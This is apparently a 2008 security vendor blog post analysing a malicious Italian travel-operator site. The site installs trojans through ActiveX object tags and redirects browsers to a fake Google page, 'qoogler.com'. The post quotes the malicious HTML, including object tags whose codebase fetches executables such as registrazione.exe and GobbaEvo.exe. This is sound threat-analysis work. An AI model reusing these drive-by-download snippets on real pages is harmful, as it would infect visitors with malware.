Feb1
11:28 am (UTC-7)   |   by Loucif Kharouni (Threats Analyst)

Yesterday we received reports of a malicious Web site that targets Italian users. This particular site purports to be a tour and travel operator for India:

The malicious source is similar to:

<object classid=”clsid:0F5FBC88-CC6A-48e8-B037-E37763D0482B” codebase=”http://www.{BLOCKED}elettronici.com/indiatouroperator/registrazione.exe“>
</object>

The file registrazione.exe is detected as TROJ_AGENT.AAFY, and the URL that it hosts is detected as HTML_AGENT.AAFX.

Once the file “Registrazione” is installed on a system, it automatically redirects to a horoscope Web site, which in fact has nothing to do with Travel Tour Operator:

Note that the file registrazione.exe (TROJ_AGENT.AAFY) downloads other malware components, such as TROJ_AGENT.ZTH.

After the download and installation are completed, the browser application indicates that an error occured during loading the “desired” Web site. The easiest and fastest way to continue when Internet Explorer (IE) browser crashes is to open a new browser — but upon doing so, the user will find that the IE start page points to a new Web site, www.qoogler.com, which poses as the legitimate Google Web site:

As anyone may wonder, this is not a typographical error from our part, but it is indeed “qoogler.com” which poses to be the Google search engine. Have a look closer at the page, and note that Google became “GOOOGLE”. It also has an “AstroGooogle” link, which sends you back to the first astrology Web site we mentioned above. This is another social engineering technique that this malware employs to fool users into downloading its components.

Here’s the HTML code for the malicous page:

</HEAD> <object classid=”CLSID:0D95404C-C067-4ecf-BB6D-AB6008717183″ codebase=”GobbaEvo.exe” width=”1″ height=”1″> </object><BODY text=#000000 vLink=#551a8b aLink=#ff0000 link=#0000cc bgColor=#ffffff>

<CENTER> <br> <IMG height=74 alt=Google src=”images/nav_logo.gif” mce_src=”images/nav_logo.gif” width=226><BR> <BR> <form name=”form1″ method=”post” action=”./index.asp”> <TABLE cellSpacing=0 cellPadding=4 border=0> <TBODY>

The file GobbaEvo.exe is also detected as TROJ_AGENT.AAFX. In the infection stage, when the user tries to search for “trendmicro” (for example) using Gooogle, he might get following result:

The search result page asks for installation of a new program to resolve yet another issue with Internet Explorer. The downloaded file is, of course, yet another malware that redirects the user to an adult page, but still under the guise of qoogler.com.

If you're new here, you may want to subscribe to our RSS feed. Thanks for visiting!



This entry was posted on Friday, February 1st, 2008 at 11:28 am and is filed under Malicious Sites, Malware . Responses are closed, but you can trackback from your own site.



Comments are closed.


419 Scammers Admit to Mail Fraud
Proxy Surfing Tools: Threats to Browsing Security


 
TrendWatch Hijack This Web Protection Add-On
Free Online Virus Scan Rootkit Buster Submit Suspicious Files
Global Malware Map RUBotted? Trend Micro
 



    		 
© Copyright 2009 Trend Micro Inc. All rights reserved. Legal Notice